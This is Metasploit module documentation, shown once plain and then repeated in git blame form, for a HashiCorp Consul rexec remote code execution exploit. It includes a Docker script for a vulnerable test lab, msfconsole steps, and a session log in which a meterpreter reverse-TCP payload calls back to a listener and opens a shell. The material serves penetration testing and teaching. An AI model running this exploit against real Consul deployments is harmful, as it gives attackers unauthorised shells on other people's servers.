documentation/modules/exploit/multi/misc/consul_rexec_exec.md

## Vulnerable Application

[HashiCorp Consul](https://www.consul.io/) with `disable_remote_exec` configuration flag set to false (default configuration up to version 0.8, opt-in since version 0.9).

### Description

This module exploits a feature of Hashicorp Consul named rexec.

The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.

The exposure of rexec service depends on the `disable_remote_exec` option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.

### Test setup

The following bash script can be used to setup a testing environment with Docker:

```
#!/bin/sh

echo "[+] Launching consul instances..."
BOOTSTRAP_ID=`docker run -p8301:8301 -d --name=consul_bootstrap_server consul:latest agent -server -client=0.0.0.0 -bootstrap -data-dir /tmp/consul`
sleep 2
BOOTSTRAP_IP=`docker inspect --format '{{ .NetworkSettings.IPAddress }}' $BOOTSTRAP_ID`
docker run -d --name=consul_client_1 -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "enable_script_checks":true, "disable_remote_exec":false}' consul:latest agent -ui -client=0.0.0.0 -retry-join=$BOOTSTRAP_IP
echo "[+] Checking members..."
docker exec -t consul_bootstrap_server consul members -http-addr="$BOOTSTRAP_IP:8500"
```

You should observe something similar to the excerpt below when running the script:

```
sudo ./launch.sh
[+] Launching consul instances...
d28e7cf476ff2f148cad81a0b1959a7c67591c2e348c6172b6f463af66d1eb9a
[+] Checking members...
Node          Address          Status  Type    Build  Protocol  DC   Segment
38a7c1d93e7f  172.17.0.1:8301  alive   server  1.4.0  2         dc1  <all>
d28e7cf476ff  172.17.0.2:8301  alive   client  1.4.0  2         dc1  <default>
```

The following bash script can be used to stop and destroy **all your consul containers** (so be careful if you use consul containers for other things at the same time):

```
#!/bin/sh
for h in `sudo docker ps -a | grep consul | cut -d' ' -f1`; do docker stop $h && docker rm $h; done
```

## Verification Steps

You can verify the module against the vulnerable application with those steps:

  1. Launch a Consul cluster with the provided bash script
  2. Start msfconsole
  3. Do: `use exploit/multi/misc/consul_rexec_exec`
  4. Do: `set RHOST ip_of_consul_container`
  5. Do: `set RPORT 8500`
  6. Do: `check`. The target should appear vulnerable.
  7. Do: `set payload` with the payload of your choosing.
  8. Do: `set LHOST 172.17.42.1` (docker0 gateway IP)
  9. Do: `run`
  10. You should get a shell.

## Scenarios

### Reverse shell on Linux host

Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target:

```
msf5 > use exploit/multi/misc/consul_rexec_exec
msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4
RHOSTS => 172.17.0.4
msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1
LHOST => 172.17.42.1
msf5 exploit(multi/misc/consul_rexec_exec) > check
[+] 172.17.0.4:8500 The target is vulnerable.
msf5 exploit(multi/misc/consul_rexec_exec) > run

[*] Started reverse TCP handler on 172.17.42.1:4444
[*] Creating session.
[*] Got rexec session ID b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Setting command for rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Triggering execution on rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Sending stage (861480 bytes) to 172.17.0.4
[*] Cleaning up rexec session b39ba52e-848d-9dc4-dc1e-e84760062335
[*] Command Stager progress - 115.73% done (883/763 bytes)

meterpreter > sysinfo
Computer     : 172.17.0.4
OS           :  (Linux 4.4.0-38-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.17.0.4 - Meterpreter session 1 closed.  Reason: User exit
```
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			`## Vulnerable Application`

fixed link 2018-12-28 09:12:31 -06:00			[HashiCorp Consul](https://www.consul.io/) with `disable_remote_exec` configuration flag set to false (default configuration up to version 0.8, opt-in since version 0.9).
List the vulnerable application and versions affected + cleaner cleanup script. 2018-12-24 13:54:02 +01:00
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			`### Description`

			`This module exploits a feature of Hashicorp Consul named rexec.`

			`The exec command provides a mechanism for remote execution. For example, this can be used to run the uptime command across all machines providing the web service.`

			The exposure of rexec service depends on the `disable_remote_exec` option. This option was set to true starting from Consul 0.8, to make remote exec opt-in instead of opt-out.

			`### Test setup`

			`The following bash script can be used to setup a testing environment with Docker:`

			```
			`#!/bin/sh`

			`echo "[+] Launching consul instances..."`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			BOOTSTRAP_ID=`docker run -p8301:8301 -d --name=consul_bootstrap_server consul:latest agent -server -client=0.0.0.0 -bootstrap -data-dir /tmp/consul`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			`sleep 2`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			BOOTSTRAP_IP=`docker inspect --format '{{ .NetworkSettings.IPAddress }}' $BOOTSTRAP_ID`
			`docker run -d --name=consul_client_1 -e 'CONSUL_LOCAL_CONFIG={"leave_on_terminate": true, "enable_script_checks":true, "disable_remote_exec":false}' consul:latest agent -ui -client=0.0.0.0 -retry-join=$BOOTSTRAP_IP`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			`echo "[+] Checking members..."`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			`docker exec -t consul_bootstrap_server consul members -http-addr="$BOOTSTRAP_IP:8500"`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			```

			`You should observe something similar to the excerpt below when running the script:`

			```
			`sudo ./launch.sh`
			`[+] Launching consul instances...`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			`d28e7cf476ff2f148cad81a0b1959a7c67591c2e348c6172b6f463af66d1eb9a`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			`[+] Checking members...`
			`Node Address Status Type Build Protocol DC Segment`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			`38a7c1d93e7f 172.17.0.1:8301 alive server 1.4.0 2 dc1 <all>`
			`d28e7cf476ff 172.17.0.2:8301 alive client 1.4.0 2 dc1 <default>`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			```

List the vulnerable application and versions affected + cleaner cleanup script. 2018-12-24 13:54:02 +01:00			`The following bash script can be used to stop and destroy all your consul containers (so be careful if you use consul containers for other things at the same time):`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00
			```
			`#!/bin/sh`
List the vulnerable application and versions affected + cleaner cleanup script. 2018-12-24 13:54:02 +01:00			for h in `sudo docker ps -a \| grep consul \| cut -d' ' -f1`; do docker stop $h && docker rm $h; done
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			```

			`## Verification Steps`

			`You can verify the module against the vulnerable application with those steps:`

			`1. Launch a Consul cluster with the provided bash script`
			`2. Start msfconsole`
			3. Do: `use exploit/multi/misc/consul_rexec_exec`
Update documentation to set up testing environment with Docker. 2018-12-20 13:51:34 +01:00			4. Do: `set RHOST ip_of_consul_container`
Hashicorp Consul RCE via rexec API (documentation). 2018-08-10 21:36:09 +02:00			5. Do: `set RPORT 8500`
			6. Do: `check`. The target should appear vulnerable.
			7. Do: `set payload` with the payload of your choosing.
			8. Do: `set LHOST 172.17.42.1` (docker0 gateway IP)
			9. Do: `run`
			`10. You should get a shell.`

			`## Scenarios`

			`### Reverse shell on Linux host`

			`Exploit running against a Docker [consul](https://hub.docker.com/_/consul/) container target:`

			```
			`msf5 > use exploit/multi/misc/consul_rexec_exec`
			`msf5 exploit(multi/misc/consul_rexec_exec) > set RHOSTS 172.17.0.4`
			`RHOSTS => 172.17.0.4`
			`msf5 exploit(multi/misc/consul_rexec_exec) > set payload linux/x86/meterpreter/reverse_tcp`
			`payload => linux/x86/meterpreter/reverse_tcp`
			`msf5 exploit(multi/misc/consul_rexec_exec) > set LHOST 172.17.42.1`
			`LHOST => 172.17.42.1`
			`msf5 exploit(multi/misc/consul_rexec_exec) > check`
			`[+] 172.17.0.4:8500 The target is vulnerable.`
			`msf5 exploit(multi/misc/consul_rexec_exec) > run`

			`[*] Started reverse TCP handler on 172.17.42.1:4444`
			`[*] Creating session.`
			`[*] Got rexec session ID b39ba52e-848d-9dc4-dc1e-e84760062335`
			`[*] Setting command for rexec session b39ba52e-848d-9dc4-dc1e-e84760062335`
			`[*] Triggering execution on rexec session b39ba52e-848d-9dc4-dc1e-e84760062335`
			`[*] Sending stage (861480 bytes) to 172.17.0.4`
			`[*] Cleaning up rexec session b39ba52e-848d-9dc4-dc1e-e84760062335`
			`[*] Command Stager progress - 115.73% done (883/763 bytes)`

			`meterpreter > sysinfo`
			`Computer : 172.17.0.4`
			`OS : (Linux 4.4.0-38-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			`meterpreter > exit`
			`[*] Shutting down Meterpreter...`

			`[*] 172.17.0.4 - Meterpreter session 1 closed. Reason: User exit`
			```